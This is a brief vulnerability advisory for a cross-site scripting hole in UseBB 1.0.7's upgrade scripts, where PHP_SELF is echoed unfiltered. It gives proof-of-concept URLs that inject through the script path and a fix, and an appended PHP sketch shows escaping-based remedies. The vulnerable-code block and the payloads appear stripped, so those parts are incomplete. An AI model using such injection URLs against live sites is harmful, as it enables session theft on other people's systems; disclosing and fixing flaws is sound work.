#############################################################
# Script...............: UseBB version: 1.0.7               #
# Script Site..........: http://www.usebb.net               #
# Vulnerability........: Cross Site Scripting (XSS)         #
# Access...............: Remote                             #
# level................: Dangerous                          #
# Author...............: S4mi                               #
# Contact..............: s4mi[at]LinuxMail.org              #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '

';
[/code]

The variable PHP_SELF is used without filtering.

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/">
http://127.0.0.1/UseBB/install/upgrade-0-3.php/">
http://127.0.0.1/UseBB/install/upgrade-0-4.php/">

Solution :
====================
Filter the PHP_SELF or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
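
Added example, not UseBB's code and not from the advisory author: a sketch of the "filter PHP_SELF" fix, showing the unfiltered pattern beside two corrected forms. The function names and the request values are hypothetical and constructed for illustration; the real code at line ~86 is not reproduced on this page.

```php
<?php
// Added illustration. Function names are hypothetical, not UseBB's.

// Pattern the advisory describes: PHP_SELF written raw into an HTML attribute.
// PHP_SELF contains whatever path the client appended after the script name,
// so it is request-controlled input.
function form_open_unfiltered(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Fix 1: HTML-escape the value for attribute context before output.
function form_open_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Fix 2: use SCRIPT_NAME, which normally excludes the appended path info,
// and still escape it on output.
function form_open_script_name(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Constructed stand-in for $_SERVER: a request with extra path info that
// contains a double quote and angle brackets (harmless marker markup).
$server = [
    'SCRIPT_NAME' => '/UseBB/install/upgrade-0-4.php',
    'PHP_SELF'    => '/UseBB/install/upgrade-0-4.php/"><b>marker</b>',
];

foreach (['form_open_unfiltered', 'form_open_escaped', 'form_open_script_name'] as $fn) {
    echo str_pad($fn, 24), $fn($server), PHP_EOL;
}

// Check a reviewer can automate: after a fix, the appended quote must not
// survive unescaped inside the action attribute.
foreach (['form_open_escaped', 'form_open_script_name'] as $fn) {
    $breaks_out = strpos($fn($server), '/"><b>') !== false;
    echo $fn, $breaks_out ? ': attribute can be closed early' : ': attribute stays intact', PHP_EOL;
}
```

Removing the install directory after setup, as the advisory recommends, takes these upgrade scripts out of reach regardless of how the form is rendered.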